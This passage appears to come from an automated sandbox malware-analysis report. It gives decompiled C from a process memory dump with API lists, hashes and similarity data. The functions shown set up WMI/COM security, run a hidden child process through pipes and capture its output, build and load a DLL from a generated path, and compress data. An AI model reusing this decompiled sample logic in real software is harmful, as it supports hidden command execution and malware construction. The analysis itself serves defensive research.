    							MultiByteToWideChar(0, 0, _t29, 0xffffffff,  &_v144, 0x3f);
    							E036085A8( &_a8);
    							_t56 = _t56 + 1;
    						} while (_t56 < 0x2710);
    						E03612A66( *0x361e69c);
    						 *_t58 = 0x7c3;
    						 *0x361e684 = E0360E1C7(0x361ba20, 0x11c);
    						 *_t58 = 0xb4e;
    						_t34 = E036095C7(0x361ba20);
    						_a8 = _t34;
    						_t35 = GetFileAttributesW(_t34);
    						_push( &_a8);
    						if(_t35 == 0xffffffff) {
    							E036085BB();
    							_v8 = 0;
    							_t39 =  *0x361e684; // 0x530f6c8
    							_t40 =  *((intOrPtr*)(_t39 + 0x70))(0, 0, E03605DEE, 0, 0,  &_v8);
    							 *0x361e6a8 = _t40;
    							if(_t40 != 0) {
    								goto L15;
    							}
    							goto L10;
    						}
    						E036085BB();
    						goto L10;
    					}
    				}
    			}

    APIs
      • Part of subcall function 036085D5: HeapCreate.KERNELBASE(00000000,00080000,00000000,03605F84), ref: 036085DE
      • Part of subcall function 036097F2: GetSystemTimeAsFileTime.KERNEL32(?,?,03605F8C), ref: 036097FF
    • GetModuleHandleA.KERNEL32(00000000), ref: 03605FA9
    • GetModuleFileNameW.KERNEL32(?,?,00000104), ref: 03605FC4
    • GetLastError.KERNEL32 ref: 03605FCC
    • memset.MSVCRT ref: 03605FF0
    • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,000000FF,?,0000003F), ref: 03606012
    • GetFileAttributesW.KERNEL32(00000000), ref: 03606060
    Memory Dump Source
    • Source File: 00000004.00000002.951544528.0000000003600000.00000040.00020000.sdmp, Offset: 03600000, based on PE: true
    Similarity
    • API ID: File$ModuleTime$AttributesByteCharCreateErrorHandleHeapLastMultiNameSystemWidememset
    • String ID:
    • API String ID: 3148476078-0
    • Opcode ID: 3b250c2393acc91253873e1b2efb341405f1fb4cc81b14c3557d5bb197ec55c1
    • Instruction ID: 6f9e0900ec3693d8f654f76c07bc3c5b8b37d79f697f5effd84b3678816b9453
    • Opcode Fuzzy Hash: 3b250c2393acc91253873e1b2efb341405f1fb4cc81b14c3557d5bb197ec55c1
    • Instruction Fuzzy Hash: 7D310574840204EFDB19FB60DE4AE6F77B9EB44710F08852EE8168B2C8EB348651CF65
    Uniqueness

    Uniqueness Score: -1.00%

    APIs
    • SysAllocString.OLEAUT32(00000000), ref: 0360D767
    • SysAllocString.OLEAUT32(?), ref: 0360D76F
    • SysAllocString.OLEAUT32(00000000), ref: 0360D783
    • SysFreeString.OLEAUT32(?), ref: 0360D7FE
    • SysFreeString.OLEAUT32(?), ref: 0360D801
    • SysFreeString.OLEAUT32(?), ref: 0360D806
    Memory Dump Source
    • Source File: 00000004.00000002.951544528.0000000003600000.00000040.00020000.sdmp, Offset: 03600000, based on PE: true
    Similarity
    • API ID: String$AllocFree
    • String ID:
    • API String ID: 344208780-0
    • Opcode ID: c644bf33bb224da03ecffd6561aa4a25b4365f133c8d92148141397f4d20153a
    • Instruction ID: b5794a60703e1655abd508e690bd518eb571c5e6977f6daab278b6ffdc061ab0
    • Opcode Fuzzy Hash: c644bf33bb224da03ecffd6561aa4a25b4365f133c8d92148141397f4d20153a
    • Instruction Fuzzy Hash: E721FB75900218BFDB04DFE5CC89DAFBBBDEF48254B14449AE505AB250DB70AE01CB60
    Uniqueness

    Uniqueness Score: -1.00%

    Strings
    Memory Dump Source
    • Source File: 00000004.00000002.951544528.0000000003600000.00000040.00020000.sdmp, Offset: 03600000, based on PE: true
    Similarity
    • API ID:
    • String ID: @$\u%04X$\u%04X\u%04X
    • API String ID: 0-2132903582
    • Opcode ID: 9a2ee2074dd9633d6084e9880d6d53dbc977249ff46abc2752b694d0b4d60494
    • Instruction ID: 229b2f2f3dc1101f7f9247e00787198064a86f1198b860f6eb95bf7faa8dacdb
    • Opcode Fuzzy Hash: 9a2ee2074dd9633d6084e9880d6d53dbc977249ff46abc2752b694d0b4d60494
    • Instruction Fuzzy Hash: 5A414E71B042099BEF68CD6C8EAABBEBA29DF05310F1C0516FD41D7345D2A1C9F192D1
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 30%
    			E0360D52E(void* __ecx) {
    				char _v8;
    				void* _v12;
    				char* _t15;
    				intOrPtr* _t16;
    				void* _t21;
    				intOrPtr* _t23;
    				intOrPtr* _t24;
    				intOrPtr* _t25;
    				void* _t30;
    				void* _t33;
    
    				_v12 = 0;
    				_v8 = 0;
    				__imp__CoInitializeEx(0, 0, _t30, _t33, __ecx, __ecx);
    				__imp__CoInitializeSecurity(0, 0xffffffff, 0, 0, 0, 3, 0, 0, 0);
    				_t15 =  &_v12;
    				__imp__CoCreateInstance(0x361b840, 0, 1, 0x361b850, _t15);
    				if(_t15 < 0) {
    					L5:
    					_t23 = _v8;
    					if(_t23 != 0) {
    						 *((intOrPtr*)( *_t23 + 8))(_t23);
    					}
    					_t24 = _v12;
    					if(_t24 != 0) {
    						 *((intOrPtr*)( *_t24 + 8))(_t24);
    					}
    					_t16 = 0;
    				} else {
    					__imp__#2(__ecx);
    					_t25 = _v12;
    					_t21 =  *((intOrPtr*)( *_t25 + 0xc))(_t25, _t15, 0, 0, 0, 0, 0, 0,  &_v8);
    					if(_t21 < 0) {
    						goto L5;
    					} else {
    						__imp__CoSetProxyBlanket(_v8, 0xa, 0, 0, 3, 3, 0, 0);
    						if(_t21 < 0) {
    							goto L5;
    						} else {
    							_t16 = E036085EA(8);
    							if(_t16 == 0) {
    								goto L5;
    							} else {
    								 *((intOrPtr*)(_t16 + 4)) = _v12;
    								 *_t16 = _v8;
    							}
    						}
    					}
    				}
    				return _t16;
    			}

    APIs
    • CoInitializeEx.OLE32(00000000,00000000,00000000,?,00000000,00000000,?,0360D82E,00000C5B,00000000,?,00000000), ref: 0360D541
    • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000,?,0360D82E,00000C5B,00000000,?,00000000), ref: 0360D552
    • CoCreateInstance.OLE32(0361B840,00000000,00000001,0361B850,?,?,0360D82E,00000C5B,00000000,?,00000000), ref: 0360D569
    • SysAllocString.OLEAUT32(00000000), ref: 0360D574
    • CoSetProxyBlanket.OLE32(00000000,0000000A,00000000,00000000,00000003,00000003,00000000,00000000,?,0360D82E,00000C5B,00000000,?,00000000), ref: 0360D59F
      • Part of subcall function 036085EA: RtlAllocateHeap.NTDLL(00000008,?,?,03608F6A,00000100,?,03605FA8), ref: 036085F8
    Memory Dump Source
    • Source File: 00000004.00000002.951544528.0000000003600000.00000040.00020000.sdmp, Offset: 03600000, based on PE: true
    Similarity
    • API ID: Initialize$AllocAllocateBlanketCreateHeapInstanceProxySecurityString
    • String ID:
    • API String ID: 1610782348-0
    • Opcode ID: 2c4f9aae03d150b8a1695702392dbad7fb4b6775f799cb137f73131a87c9d4e5
    • Instruction ID: 09689f36d428e4e64cea025b0308c37a01738594c8c9faef15629433fdf34f49
    • Opcode Fuzzy Hash: 2c4f9aae03d150b8a1695702392dbad7fb4b6775f799cb137f73131a87c9d4e5
    • Instruction Fuzzy Hash: EF21F871700245BFD7299BA2CC4EE6BBF7CEFC6B15F14455DB906A7294C6709A01CA30
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 79%
    			E0361220A(char* __eax, char** _a4, long long* _a8) {
    				char* _v8;
    				long long _v16;
    				char* _t9;
    				signed char _t11;
    				char** _t19;
    				char _t22;
    				long long _t32;
    				long long _t33;
    
    				_t9 = __eax;
    				L036122D8();
    				_t19 = _a4;
    				_t22 =  *__eax;
    				if( *_t22 != 0x2e) {
    					_t9 = strchr( *_t19, 0x2e);
    					if(_t9 != 0) {
    						 *_t9 =  *_t22;
    					}
    				}
    				L0361229C();
    				 *_t9 =  *_t9 & 0x00000000;
    				_t11 = strtod( *_t19,  &_v8);
    				asm("fst qword [ebp-0xc]");
    				_t32 =  *0x3618248;
    				asm("fucomp st1");
    				asm("fnstsw ax");
    				if((_t11 & 0x00000044) != 0) {
    					L5:
    					st0 = _t32;
    					L0361229C();
    					if( *_t11 != 0x22) {
    						_t33 = _v16;
    						goto L8;
    					} else {
    						return _t11 | 0xffffffff;
    					}
    				} else {
    					_t33 =  *0x3618250;
    					asm("fucomp st1");
    					asm("fnstsw ax");
    					if((_t11 & 0x00000044) != 0) {
    						L8:
    						 *_a8 = _t33;
    						return 0;
    					} else {
    						goto L5;
    					}
    				}
    			}

    APIs
    Memory Dump Source
    • Source File: 00000004.00000002.951544528.0000000003600000.00000040.00020000.sdmp, Offset: 03600000, based on PE: true
    Similarity
    • API ID: _errno$localeconvstrchrstrtod
    • String ID:
    • API String ID: 1035490122-0
    • Opcode ID: d310b3dc1a1b2d08446545c70640cd7d9a5e3513331002ebe5804262253d6208
    • Instruction ID: f1345d1da72f6ba6f197c249ea9af2b64dbe99335a5cef65423bc3de913bc0c5
    • Opcode Fuzzy Hash: d310b3dc1a1b2d08446545c70640cd7d9a5e3513331002ebe5804262253d6208
    • Instruction Fuzzy Hash: FE01D43990020DAADF12FF24E91469DFBA4AF4B360F2C09D4D9806B1D5CB748475CBAC
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 73%
    			E0360A99D(signed int __ecx) {
    				void* _v8;
    				void* _v12;
    				void* _v16;
    				void* _v20;
    				signed int _v24;
    				char _v28;
    				char _v32;
    				char _v36;
    				struct _SECURITY_ATTRIBUTES _v48;
    				intOrPtr _v60;
    				char _v64;
    				intOrPtr _v76;
    				intOrPtr _v80;
    				void* _v84;
    				short _v92;
    				intOrPtr _v96;
    				void _v140;
    				intOrPtr _t77;
    				void* _t79;
    				intOrPtr _t85;
    				intOrPtr _t87;
    				intOrPtr _t89;
    				intOrPtr _t92;
    				intOrPtr _t98;
    				intOrPtr _t100;
    				intOrPtr _t102;
    				long _t111;
    				intOrPtr _t115;
    				intOrPtr _t126;
    				void* _t127;
    				void* _t128;
    				void* _t129;
    				void* _t130;
    
    				_t111 = 0;
    				_v24 = __ecx;
    				_v12 = 0;
    				_v20 = 0;
    				_t127 = 0;
    				_v8 = 0;
    				_v16 = 0;
    				_v48.nLength = 0xc;
    				_v48.lpSecurityDescriptor = 0;
    				_v48.bInheritHandle = 1;
    				_v28 = 0;
    				memset( &_v140, 0, 0x44);
    				asm("stosd");
    				_t130 = _t129 + 0xc;
    				asm("stosd");
    				asm("stosd");
    				asm("stosd");
    				if(CreatePipe( &_v12,  &_v20,  &_v48, 0) == 0) {
    					L18:
    					return 0;
    				}
    				if(CreatePipe( &_v8,  &_v16,  &_v48, 0) == 0) {
    					L13:
    					E03608600( &_v28, 0);
    					if(_v20 != 0) {
    						_t77 =  *0x361e684; // 0x530f6c8
    						 *((intOrPtr*)(_t77 + 0x30))(_v20);
    					}
    					if(_v8 != 0) {
    						_t115 =  *0x361e684; // 0x530f6c8
    						 *((intOrPtr*)(_t115 + 0x30))(_v8);
    					}
    					return _t111;
    				}
    				_t79 = _v16;
    				_v76 = _t79;
    				_v80 = _t79;
    				_v84 = _v12;
    				_v140 = 0x44;
    				_v96 = 0x101;
    				_v92 = 0;
    				_t126 = E036085EA(0x1001);
    				_v28 = _t126;
    				if(_t126 == 0) {
    					goto L18;
    				}
    				_push( &_v64);
    				_push( &_v140);
    				_t85 =  *0x361e684; // 0x530f6c8
    				_push(0);
    				_push(0);
    				_push(0x8000000);
    				_push(1);
    				_push(0);
    				_push(0);
    				_push(_v24);
    				_push(0);
    				if( *((intOrPtr*)(_t85 + 0x38))() == 0) {
    					goto L13;
    				}
    				_t87 =  *0x361e684; // 0x530f6c8
    				 *((intOrPtr*)(_t87 + 0x30))(_v12);
    				_t89 =  *0x361e684; // 0x530f6c8
    				 *((intOrPtr*)(_t89 + 0x30))(_v16);
    				_v24 = _v24 & 0;
    				do {
    					_t92 =  *0x361e684; // 0x530f6c8
    					_v36 =  *((intOrPtr*)(_t92 + 0x88))(_v8, _t126, 0x1000,  &_v24, 0);
    					 *((char*)(_v24 + _t126)) = 0;
    					if(_t111 == 0) {
    						_t127 = E0360918C(_t126, 0);
    					} else {
    						_push(0);
    						_push(_t126);
    						_v32 = _t127;
    						_t127 = E03609278(_t127);
    						E03608600( &_v32, 0xffffffff);
    						_t130 = _t130 + 0x14;
    					}
    					_t111 = _t127;
    					_v32 = _t127;
    				} while (_v36 != 0);
    				_push( &_v36);
    				_push(E0360C384(_t127));
    				_t98 =  *0x361e68c; // 0x530f890
    				_push(_t127);
    				if( *((intOrPtr*)(_t98 + 0xb8))() != 0) {
    					L12:
    					_t100 =  *0x361e684; // 0x530f6c8
    					 *((intOrPtr*)(_t100 + 0x30))(_v64);
    					_t102 =  *0x361e684; // 0x530f6c8
    					 *((intOrPtr*)(_t102 + 0x30))(_v60);
    					goto L13;
    				}
    				_t128 = E0360923C(_t127);
    				if(_t128 == 0) {
    					goto L12;
    				}
    				E03608600( &_v32, 0);
    				return _t128;
    			}

    APIs
    • memset.MSVCRT ref: 0360A9DA
    • CreatePipe.KERNEL32(?,?,0000000C,00000000,00000000,00000000,00000000), ref: 0360A9FE
    • CreatePipe.KERNEL32(0360658F,?,0000000C,00000000), ref: 0360AA15
      • Part of subcall function 036085EA: RtlAllocateHeap.NTDLL(00000008,?,?,03608F6A,00000100,?,03605FA8), ref: 036085F8
      • Part of subcall function 03608600: RtlFreeHeap.NTDLL(00000000,00000000,00000001,000000FF,03606020), ref: 03608646
    Strings
    Memory Dump Source
    • Source File: 00000004.00000002.951544528.0000000003600000.00000040.00020000.sdmp, Offset: 03600000, based on PE: true
    Similarity
    • API ID: CreateHeapPipe$AllocateFreememset
    • String ID: D
    • API String ID: 2365139273-2746444292
    • Opcode ID: 0b3c688a8dd84c9c04ec08c98692dfc30fe2eb3d50c1118510bf4c806ee7ab0d
    • Instruction ID: a62b6490877683892db80ba05156e271bb716af4d3d1b5248d3fc65e03a147ba
    • Opcode Fuzzy Hash: 0b3c688a8dd84c9c04ec08c98692dfc30fe2eb3d50c1118510bf4c806ee7ab0d
    • Instruction Fuzzy Hash: B9515972910209AFDB14DFE8C885FDFB7B9AF08300F54416AF500E7290DB719A058B65
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 89%
    			E0360C4D9(void* __ebx, void* __edx, void* __edi, void* __esi) {
    				char _v8;
    				char _v12;
    				void _v140;
    				signed char _t14;
    				char _t15;
    				intOrPtr _t20;
    				void* _t25;
    				intOrPtr _t26;
    				intOrPtr _t32;
    				WCHAR* _t34;
    				intOrPtr _t35;
    				struct HINSTANCE__* _t37;
    				int _t38;
    				intOrPtr _t46;
    				void* _t47;
    				intOrPtr _t50;
    				void* _t60;
    				void* _t61;
    				char _t62;
    				char* _t63;
    				void* _t65;
    				intOrPtr _t66;
    				char _t68;
    
    				_t65 = __esi;
    				_t61 = __edi;
    				_t47 = __ebx;
    				_t50 =  *0x361e688; // 0x33f0000
    				_t14 =  *(_t50 + 0x1898);
    				if(_t14 == 0x100 ||  *((intOrPtr*)(_t50 + 4)) >= 0xa && (_t14 & 0x00000004) != 0) {
    					_t15 = E036095C7(_t50, 0xb62);
    					_t66 =  *0x361e688; // 0x33f0000
    					_t62 = _t15;
    					_t67 = _t66 + 0xb0;
    					_v8 = _t62;
    					E03609626( &_v140, 0x40, L"%08x", E0360D40B(_t66 + 0xb0, E0360C384(_t66 + 0xb0), 0));
    					_t20 =  *0x361e688; // 0x33f0000
    					asm("sbb eax, eax");
    					_t25 = E036095C7(_t67, ( ~( *(_t20 + 0xa8)) & 0x00000068) + 0x615);
    					_t63 = "\\";
    					_t26 =  *0x361e688; // 0x33f0000
    					_t68 = E036092CB(_t26 + 0x1020);
    					_v12 = _t68;
    					E036085BB( &_v8);
    					_t32 =  *0x361e688; // 0x33f0000
    					_t34 = E036092CB(_t32 + 0x122a);
    					 *0x361e784 = _t34;
    					_t35 =  *0x361e684; // 0x530f6c8
    					 *((intOrPtr*)(_t35 + 0x110))(_t68, _t34, 0, _t63,  &_v140, ".", L"dll", 0, _t63, _t25, _t63, _t62, 0, _t61, _t65, _t47);
    					_t37 = LoadLibraryW( *0x361e784);
    					 *0x361e77c = _t37;
    					if(_t37 == 0) {
    						_t38 = 0;
    					} else {
    						_push(_t37);
    						_t60 = 0x28;
    						_t38 = E0360E17C(0x361bb40, _t60);
    					}
    					 *0x361e780 = _t38;
    					E03608600( &_v12, 0xfffffffe);
    					memset( &_v140, 0, 0x80);
    					if( *0x361e780 != 0) {
    						goto L10;
    					} else {
    						E03608600(0x361e784, 0xfffffffe);
    						goto L8;
    					}
    				} else {
    					L8:
    					if( *0x361e780 == 0) {
    						_t46 =  *0x361e6bc; // 0x530f7f0
    						 *0x361e780 = _t46;
    					}
    					L10:
    					return 1;
    				}
    			}

    APIs
    Strings
    Memory Dump Source
    • Source File: 00000004.00000002.951544528.0000000003600000.00000040.00020000.sdmp, Offset: 03600000, based on PE: true
    Similarity
    • API ID: LibraryLoadmemset
    • String ID: %08x$dll
    • API String ID: 3406617148-2963171978
    • Opcode ID: 4a3a49dc870853abe098eefe0540b2bdc469dc328233f7aad7d2e13d4775f427
    • Instruction ID: 0439545dddee126aca06656ae0e43f29bacba62c495c8dfae44af25a05471890
    • Opcode Fuzzy Hash: 4a3a49dc870853abe098eefe0540b2bdc469dc328233f7aad7d2e13d4775f427
    • Instruction Fuzzy Hash: 2C31E6B2A10304AFE714EB68EC4AF9B73ACE709314F48452AF404DB1C4DB75D9508758
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 99%
    			E03612D80(int _a4, signed int _a8) {
    				int _v8;
    				intOrPtr _v12;
    				signed int _v16;
    				void* __esi;
    				void* _t137;
    				signed int _t141;
    				intOrPtr* _t142;
    				signed int _t145;
    				signed int _t146;
    				intOrPtr _t151;
    				intOrPtr _t161;
    				intOrPtr _t162;
    				intOrPtr _t167;
    				intOrPtr _t170;
    				signed int _t172;
    				intOrPtr _t173;
    				int _t184;
    				intOrPtr _t185;
    				intOrPtr _t188;
    				signed int _t189;
    				void* _t195;
    				int _t202;
    				int _t208;
    				intOrPtr _t217;
    				signed int _t218;
    				int _t219;
    				intOrPtr _t220;
    				signed int _t221;
    				signed int _t222;
    				int _t224;
    				int _t225;
    				signed int _t227;
    				intOrPtr _t228;
    				int _t232;
    				int _t234;
    				signed int _t235;
    				int _t239;
    				void* _t240;
    				int _t245;
    				int _t252;
    				signed int _t253;
    				int _t254;
    				void* _t257;
    				void* _t258;
    				int _t259;
    				intOrPtr _t260;
    				int _t261;
    				signed int _t269;
    				signed int _t271;
    				intOrPtr* _t272;
    				void* _t273;
    
    				_t253 = _a8;
    				_t272 = _a4;
    				_t3 = _t272 + 0xc; // 0x452bf84d
    				_t4 = _t272 + 0x2c; // 0x8df075ff
    				_t228 =  *_t4;
    				_t137 =  *_t3 + 0xfffffffb;
    				_t229 =  <=  ? _t137 : _t228;
    				_v16 =  <=  ? _t137 : _t228;
    				_t269 = 0;
    				_a4 =  *((intOrPtr*)( *_t272 + 4));
    				asm("o16 nop [eax+eax]");
    				while(1) {
    					_t8 = _t272 + 0x16bc; // 0x8b3c7e89
    					_t141 =  *_t8 + 0x2a >> 3;
    					_v12 = 0xffff;
    					_t217 =  *((intOrPtr*)( *_t272 + 0x10));
    					if(_t217 < _t141) {
    						break;
    					}
    					_t11 = _t272 + 0x6c; // 0xa1ec8b55
    					_t12 = _t272 + 0x5c; // 0x5fe85000
    					_t245 =  *_t11 -  *_t12;
    					_v8 = _t245;
    					_t195 =  *((intOrPtr*)( *_t272 + 4)) + _t245;
    					_t247 =  <  ? _t195 : _v12;
    					_t227 =  <=  ?  <  ? _t195 : _v12 : _t217 - _t141;
    					if(_t227 >= _v16) {
    						L7:
    						if(_t253 != 4) {
    							L10:
    							_t269 = 0;
    							__eflags = 0;
    						} else {
    							_t285 = _t227 - _t195;
    							if(_t227 != _t195) {
    								goto L10;
    							} else {
    								_t269 = _t253 - 3;
    							}
    						}
    						E03615DA0(_t272, _t272, 0, 0, _t269);
    						_t18 = _t272 + 0x14; // 0xc703f045
    						_t19 = _t272 + 8; // 0x8d000040
    						 *( *_t18 +  *_t19 - 4) = _t227;
    						_t22 = _t272 + 0x14; // 0xc703f045
    						_t23 = _t272 + 8; // 0x8d000040
    						 *((char*)( *_t22 +  *_t23 - 3)) = _t227 >> 8;
    						_t26 = _t272 + 0x14; // 0xc703f045
    						_t27 = _t272 + 8; // 0x8d000040
    						 *( *_t26 +  *_t27 - 2) =  !_t227;
    						_t30 = _t272 + 0x14; // 0xc703f045
    						_t31 = _t272 + 8; // 0x8d000040
    						 *((char*)( *_t30 +  *_t31 - 1)) =  !_t227 >> 8;
    						E03614B00(_t285,  *_t272);
    						_t202 = _v8;
    						_t273 = _t273 + 0x14;
    						if(_t202 != 0) {
    							_t208 =  >  ? _t227 : _t202;
    							_v8 = _t208;
    							_t36 = _t272 + 0x38; // 0xf47d8bff
    							_t37 = _t272 + 0x5c; // 0x5fe85000
    							memcpy( *( *_t272 + 0xc),  *_t36 +  *_t37, _t208);
    							_t273 = _t273 + 0xc;
    							_t252 = _v8;
    							 *( *_t272 + 0xc) =  *( *_t272 + 0xc) + _t252;
    							 *((intOrPtr*)( *_t272 + 0x10)) =  *((intOrPtr*)( *_t272 + 0x10)) - _t252;
    							 *((intOrPtr*)( *_t272 + 0x14)) =  *((intOrPtr*)( *_t272 + 0x14)) + _t252;
    							 *(_t272 + 0x5c) =  *(_t272 + 0x5c) + _t252;
    							_t227 = _t227 - _t252;
    						}
    						if(_t227 != 0) {
    							E03614C40( *_t272,  *( *_t272 + 0xc), _t227);
    							_t273 = _t273 + 0xc;
    							 *( *_t272 + 0xc) =  *( *_t272 + 0xc) + _t227;
    							 *((intOrPtr*)( *_t272 + 0x10)) =  *((intOrPtr*)( *_t272 + 0x10)) - _t227;
    							 *((intOrPtr*)( *_t272 + 0x14)) =  *((intOrPtr*)( *_t272 + 0x14)) + _t227;
    						}
    						_t253 = _a8;
    						if(_t269 == 0) {
    							continue;
    						}
    					} else {
    						if(_t227 != 0 || _t253 == 4) {
    							if(_t253 != 0 && _t227 == _t195) {
    								goto L7;
    							}
    						}
    					}
    					break;
    				}
    				_t142 =  *_t272;
    				_t232 = _a4 -  *((intOrPtr*)(_t142 + 4));
    				_a4 = _t232;
    				if(_t232 == 0) {
    					_t83 = _t272 + 0x6c; // 0xa1ec8b55
    					_t254 =  *_t83;
    				} else {
    					_t59 = _t272 + 0x2c; // 0x8df075ff
    					_t224 =  *_t59;
    					if(_t232 < _t224) {
    						_t65 = _t272 + 0x3c; // 0x830cc483
    						_t66 = _t272 + 0x6c; // 0xa1ec8b55
    						_t260 =  *_t66;
    						__eflags =  *_t65 - _t260 - _t232;
    						if( *_t65 - _t260 <= _t232) {
    							_t67 = _t272 + 0x38; // 0xf47d8bff
    							_t261 = _t260 - _t224;
    							 *(_t272 + 0x6c) = _t261;
    							memcpy( *_t67,  *_t67 + _t224, _t261);
    							_t70 = _t272 + 0x16b0; // 0xdf750008
    							_t188 =  *_t70;
    							_t273 = _t273 + 0xc;
    							_t232 = _a4;
    							__eflags = _t188 - 2;
    							if(_t188 < 2) {
    								_t189 = _t188 + 1;
    								__eflags = _t189;
    								 *(_t272 + 0x16b0) = _t189;
    							}
    						}
    						_t73 = _t272 + 0x38; // 0xf47d8bff
    						_t74 = _t272 + 0x6c; // 0xa1ec8b55
    						memcpy( *_t73 +  *_t74,  *((intOrPtr*)( *_t272)) - _t232, _t232);
    						_t225 = _a4;
    						_t273 = _t273 + 0xc;
    						_t76 = _t272 + 0x6c;
    						 *_t76 =  *(_t272 + 0x6c) + _t225;
    						__eflags =  *_t76;
    						_t78 = _t272 + 0x6c; // 0xa1ec8b55
    						_t184 =  *_t78;
    						_t79 = _t272 + 0x2c; // 0x8df075ff
    						_t239 =  *_t79;
    					} else {
    						 *(_t272 + 0x16b0) = 2;
    						_t61 = _t272 + 0x38; // 0xf47d8bff
    						memcpy( *_t61,  *_t142 - _t224, _t224);
    						_t62 = _t272 + 0x2c; // 0x8df075ff
    						_t184 =  *_t62;
    						_t273 = _t273 + 0xc;
    						_t225 = _a4;
    						_t239 = _t184;
    						 *(_t272 + 0x6c) = _t184;
    					}
    					_t254 = _t184;
    					 *(_t272 + 0x5c) = _t184;
    					_t81 = _t272 + 0x16b4; // 0xe9ffcb83
    					_t185 =  *_t81;
    					_t240 = _t239 - _t185;
    					_t241 =  <=  ? _t225 : _t240;
    					_t242 = ( <=  ? _t225 : _t240) + _t185;
    					 *((intOrPtr*)(_t272 + 0x16b4)) = ( <=  ? _t225 : _t240) + _t185;
    				}
    				if( *(_t272 + 0x16c0) < _t254) {
    					 *(_t272 + 0x16c0) = _t254;
    				}
    				if(_t269 == 0) {
    					_t218 = _a8;
    					__eflags = _t218;
    					if(_t218 == 0) {
    						L34:
    						_t89 = _t272 + 0x3c; // 0x830cc483
    						_t219 =  *_t272;
    						_t145 =  *_t89 - _t254 - 1;
    						_a4 =  *_t272;
    						_t234 = _t254;
    						_v16 = _t145;
    						_v8 = _t254;
    						__eflags =  *((intOrPtr*)(_t219 + 4)) - _t145;
    						if( *((intOrPtr*)(_t219 + 4)) > _t145) {
    							_v8 = _t254;
    							_t95 = _t272 + 0x5c; // 0x5fe85000
    							_a4 = _t219;
    							_t234 = _t254;
    							_t97 = _t272 + 0x2c; // 0x8df075ff
    							__eflags =  *_t95 -  *_t97;
    							if( *_t95 >=  *_t97) {
    								_t98 = _t272 + 0x2c; // 0x8df075ff
    								_t167 =  *_t98;
    								_t259 = _t254 - _t167;
    								_t99 = _t272 + 0x38; // 0xf47d8bff
    								 *(_t272 + 0x5c) =  *(_t272 + 0x5c) - _t167;
    								 *(_t272 + 0x6c) = _t259;
    								memcpy( *_t99, _t167 +  *_t99, _t259);
    								_t103 = _t272 + 0x16b0; // 0xdf750008
    								_t170 =  *_t103;
    								_t273 = _t273 + 0xc;
    								__eflags = _t170 - 2;
    								if(_t170 < 2) {
    									_t172 = _t170 + 1;
    									__eflags = _t172;
    									 *(_t272 + 0x16b0) = _t172;
    								}
    								_t106 = _t272 + 0x2c; // 0x8df075ff
    								_t145 = _v16 +  *_t106;
    								__eflags = _t145;
    								_a4 =  *_t272;
    								_t108 = _t272 + 0x6c; // 0xa1ec8b55
    								_t234 =  *_t108;
    								_v8 = _t234;
    							}
    						}
    						_t255 = _a4;
    						_t220 =  *((intOrPtr*)(_a4 + 4));
    						__eflags = _t145 - _t220;
    						_t221 =  <=  ? _t145 : _t220;
    						_t146 = _t221;
    						_a4 = _t221;
    						_t222 = _a8;
    						__eflags = _t146;
    						if(_t146 != 0) {
    							_t114 = _t272 + 0x38; // 0xf47d8bff
    							E03614C40(_t255,  *_t114 + _v8, _t146);
    							_t273 = _t273 + 0xc;
    							_t117 = _t272 + 0x6c;
    							 *_t117 =  *(_t272 + 0x6c) + _a4;
    							__eflags =  *_t117;
    							_t119 = _t272 + 0x6c; // 0xa1ec8b55
    							_t234 =  *_t119;
    						}
    						__eflags =  *(_t272 + 0x16c0) - _t234;
    						if( *(_t272 + 0x16c0) < _t234) {
    							 *(_t272 + 0x16c0) = _t234;
    						}
    						_t122 = _t272 + 0x16bc; // 0x8b3c7e89
    						_t123 = _t272 + 0xc; // 0x452bf84d
    						_t257 =  *_t123 - ( *_t122 + 0x2a >> 3);
    						__eflags = _t257 - 0xffff;
    						_t258 =  >  ? 0xffff : _t257;
    						_t124 = _t272 + 0x2c; // 0x8df075ff
    						_t151 =  *_t124;
    						_t125 = _t272 + 0x5c; // 0x5fe85000
    						_t235 = _t234 -  *_t125;
    						__eflags = _t258 - _t151;
    						_t152 =  <=  ? _t258 : _t151;
    						__eflags = _t235 - ( <=  ? _t258 : _t151);
    						if(_t235 >= ( <=  ? _t258 : _t151)) {
    							L49:
    							__eflags = _t235 - _t258;
    							_t154 =  >  ? _t258 : _t235;
    							_a4 =  >  ? _t258 : _t235;
    							__eflags = _t222 - 4;
    							if(_t222 != 4) {
    								L53:
    								_t269 = 0;
    								__eflags = 0;
    							} else {
    								_t161 =  *_t272;
    								__eflags =  *(_t161 + 4);
    								_t154 = _a4;
    								if( *(_t161 + 4) != 0) {
    									goto L53;
    								} else {
    									__eflags = _t154 - _t235;
    									if(_t154 != _t235) {
    										goto L53;
    									} else {
    										_t269 = _t222 - 3;
    									}
    								}
    							}
    							_t131 = _t272 + 0x38; // 0xf47d8bff
    							_t132 = _t272 + 0x5c; // 0x5fe85000
    							E03615DA0(_t272, _t272,  *_t131 +  *_t132, _t154, _t269);
    							_t134 = _t272 + 0x5c;
    							 *_t134 =  *(_t272 + 0x5c) + _a4;
    							__eflags =  *_t134;
    							E03614B00( *_t134,  *_t272);
    						} else {
    							__eflags = _t235;
    							if(_t235 != 0) {
    								L46:
    								__eflags = _t222;
    								if(_t222 != 0) {
    									_t162 =  *_t272;
    									__eflags =  *(_t162 + 4);
    									if( *(_t162 + 4) == 0) {
    										__eflags = _t235 - _t258;
    										if(_t235 <= _t258) {
    											goto L49;
    										}
    									}
    								}
    							} else {
    								__eflags = _t222 - 4;
    								if(_t222 == 4) {
    									goto L46;
    								}
    							}
    						}
    						asm("sbb edi, edi");
    						_t271 =  ~_t269 & 0x00000002;
    						__eflags = _t271;
    						return _t271;
    					} else {
    						__eflags = _t218 - 4;
    						if(_t218 == 4) {
    							goto L34;
    						} else {
    							_t173 =  *_t272;
    							__eflags =  *(_t173 + 4);
    							if( *(_t173 + 4) != 0) {
    								goto L34;
    							} else {
    								_t88 = _t272 + 0x5c; // 0x5fe85000
    								__eflags = _t254 -  *_t88;
    								if(_t254 !=  *_t88) {
    									goto L34;
    								} else {
    									return 1;
    								}
    							}
    						}
    					}
    				} else {
    					return 3;
    				}
    			}

    APIs
